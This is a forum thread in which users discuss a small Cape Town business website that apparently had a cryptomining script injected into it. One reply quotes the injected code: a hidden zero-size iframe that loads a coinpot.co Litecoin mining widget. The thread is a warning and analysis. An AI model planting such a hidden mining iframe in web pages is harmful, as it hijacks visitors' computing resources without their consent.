Embedded cryptominer in otherwise unsuspecting website

[newby_investor]

So I was looking for somewhere to buy used pallets in Cape Town, and came across this website:

Store - Webflow HTML website template

palletman.co.za

and Firefox warned me that there was cryptomining being blocked (I used NoScript anyway so it wasn't happening, but two layers of protection are better than none.

On looking closer, scripts from coinpot.co wanted to be loaded.

The cheek!

Anyone else come across anything like this before? I filled in the "contact us" page and told whoever was behind the website that I was unimpressed by their attempt to mine cryptocurrency using my resources, and that I wouldn't be doing business with them as a result.

 

[longboy]

Yup, confirmed.

 

[newklear]

Phew! very sneaky indeed.

 

[newby_investor]

Instead, you should have politely warned them that they have been infected with cryptomining malware - it's not likely their doing.

I mean this is a fair point. But how realistic is that? The attacker would need to be fairly wily, and who would bother going to the trouble of attacking a guy who sells used pallets in Cape Town?

 

[saor]

I mean this is a fair point. But how realistic is that? The attacker would need to be fairly wily, and who would bother going to the trouble of attacking a guy who sells used pallets in Cape Town?

If you have a script crawling the web for weaknesses to exploit it's probably agnostic as to the vulnerable website and its content.

 

[Jet-Fighter7700]

nasty nasty.
sure it wasn't intentional, just unlucky probably.

 

[Fulcrum29]

Wordpress and its plugins are very popular hence vulnerable. It is most likely a mischievous inserted script, otherwise they used 'pirated' plugins and or theme.

 

[Fulcrum29]

Inserted as a wrapper,

<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/litecoin/?ref=077E436906EF&amp;mode=widget" style="width:0;height:0;border:0; border:none;" gt1vmh0vj=""></iframe>

 

[newby_investor]

Well the nerve of some people!

Thanks for pointing out the possibility that it may not have been the intention of the Pallet Man, I have written to him apologising for my earlier remarks and pointing out that his website may have been compromised.

It's really astonishing what we need to be careful of in this day and age. Some people have no respect, I tell you.

 

[Fulcrum29]

Well the nerve of some people!

Thanks for pointing out the possibility that it may not have been the intention of the Pallet Man, I have written to him apologising for my earlier remarks and pointing out that his website may have been compromised.

It's really astonishing what we need to be careful of in this day and age. Some people have no respect, I tell you.

I don't trust anyone, but I have seen similar inserts and database injections. I scolded a Themeforest publisher the other day for having an already exploited Revolution Slider in their demo content. It was promptly fixed, but still, Envato should review what is being published in their marketplaces.

The possibility does exist that the 'webmaster' could have inserted the script. It was also very poorly inserted because professional, but malicious, scripts are encoded, but still detectable just harder to find if you don't know where to look.